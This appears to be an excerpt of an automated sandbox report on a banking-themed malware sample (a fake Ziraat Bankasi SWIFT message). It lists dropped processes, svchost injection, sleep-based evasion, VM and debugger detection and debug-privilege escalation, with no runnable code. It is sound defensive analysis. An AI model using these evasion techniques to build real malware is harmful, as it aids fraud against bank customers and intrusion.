                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99530s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99422s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99312s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99203s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99094s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -98969s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -98860s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -98735s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep count: 7994 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 1615 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -7378697629483816s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7420Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7472Thread sleep time: -309900000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7472Thread sleep time: -277380000s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7356Thread sleep count: 34 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7900Thread sleep time: -90000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7884Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe TID: 7972Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8160Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_000C6CA9
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_000C60DD
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_000C63F9
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CF56F FindFirstFileW,FindClose,0_2_000CF56F
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_000CF5FA
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000D1B2F
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_000CEB60
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000D1C8A
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_000D1F94
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00906CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00906CA9
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_009060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_009060DD
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_009063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_009063F9
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_0090F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0090F5FA
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_0090F56F FindFirstFileW,FindClose,2_2_0090F56F
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00911B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00911B2F
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_0090EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0090EB60
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00911C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00911C8A
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00911F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00911F94
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0009DDC0
                          Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99890Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99780Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99671Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99562Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99452Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99343Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99230Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99080Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98888Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98636Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98062Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97640Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97500Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97374Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97265Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97145Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97015Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96888Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96780Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96661Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96546Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96437Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96328Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96218Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96109Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95890Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95781Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95671Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95558Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95453Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95266Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95106Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94873Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94317Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94184Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94078Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93968Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93859Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93749Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93640Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93531Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93421Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93312Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99874Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99766Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99632Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99530Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99422Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99312Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99203Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99094Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98969Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98860Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98735Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                          Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                          Source: svchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                          Source: svchost.exe, svchost.exe, 00000022.00000003.1573768980.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575866275.00000000032BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: svchost.exe, 00000022.00000002.1575511280.0000000003256000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                          Source: wscript.exe, 00000019.00000002.1404289962.00000135B0E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                          Source: aut8747.tmp.0.drBinary or memory string: VMCi'
                          Source: Lityerses.0.dr, autCC4E.tmp.29.dr, aut8747.tmp.0.drBinary or memory string: aqEmU
                          Source: neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: server02.exe, 0000000C.00000002.3708584872.0000000000A23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: svchost.exe, 00000022.00000003.1573768980.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575866275.00000000032BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWackIgnoreDisableDefaultSigsNISSignatureAppliedSignatureUpdateCountNISSignatureLocationNISSignatureVersionNISEngineVersionNISEngineVersionNISSignatureLocationFirstAuGracePeriodFirstAuGrace
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeAPI call chain: ExitProcess graph end nodegraph_0-54546
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeAPI call chain: ExitProcess graph end nodegraph_2-54262
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeAPI call chain: ExitProcess graph end nodegraph_2-54565
                          Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D6AAF BlockInput,0_2_000D6AAF
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000B375F IsDebuggerPresent,0_2_000B375F
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_000B3920
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009E01E LoadLibraryA,GetProcAddress,0_2_0009E01E
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00E418D0 mov eax, dword ptr fs:[00000030h]0_2_00E418D0
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00E42F70 mov eax, dword ptr fs:[00000030h]0_2_00E42F70
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00E42F10 mov eax, dword ptr fs:[00000030h]0_2_00E42F10
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_015D3478 mov eax, dword ptr fs:[00000030h]2_2_015D3478
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_015D34D8 mov eax, dword ptr fs:[00000030h]2_2_015D34D8
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_015D1E38 mov eax, dword ptr fs:[00000030h]2_2_015D1E38
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00505394 mov eax, dword ptr fs:[00000030h]5_2_00505394
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BC3F3D mov eax, dword ptr fs:[00000030h]5_2_04BC3F3D
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04B81130 mov eax, dword ptr fs:[00000030h]5_2_04B81130
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 26_2_016A7878 mov eax, dword ptr fs:[00000030h]26_2_016A7878
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 26_2_016A8EB8 mov eax, dword ptr fs:[00000030h]26_2_016A8EB8
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 26_2_016A8F18 mov eax, dword ptr fs:[00000030h]26_2_016A8F18
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 29_2_00EAB1C8 mov eax, dword ptr fs:[00000030h]29_2_00EAB1C8
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 29_2_00EAB228 mov eax, dword ptr fs:[00000030h]29_2_00EAB228
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 29_2_00EA9B88 mov eax, dword ptr fs:[00000030h]29_2_00EA9B88
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 31_2_011FDBB0 mov eax, dword ptr fs:[00000030h]31_2_011FDBB0
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 31_2_011FF250 mov eax, dword ptr fs:[00000030h]31_2_011FF250
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 31_2_011FF1F0 mov eax, dword ptr fs:[00000030h]31_2_011FF1F0
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 33_2_00D16E78 mov eax, dword ptr fs:[00000030h]33_2_00D16E78
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 33_2_00D18518 mov eax, dword ptr fs:[00000030h]33_2_00D18518
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 33_2_00D184B8 mov eax, dword ptr fs:[00000030h]33_2_00D184B8
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_00505394 mov eax, dword ptr fs:[00000030h]34_2_00505394
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E93F3D mov eax, dword ptr fs:[00000030h]34_2_04E93F3D
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E51130 mov eax, dword ptr fs:[00000030h]34_2_04E51130
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000BB1CC GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,0_2_000BB1CC
                          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A8189 SetUnhandledExceptionFilter,0_2_000A8189
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000A81AC
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008E8189 SetUnhandledExceptionFilter,2_2_008E8189
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008E81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_008E81AC
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040E61C
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00416F6A
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004123F1 SetUnhandledExceptionFilter,5_2_004123F1
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BC4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_04BC4C7B
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BC1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_04BC1361
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_0040CE09
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_0040E61C
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00416F6A
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_004123F1 SetUnhandledExceptionFilter,34_2_004123F1
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_04E94C7B
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_04E91361
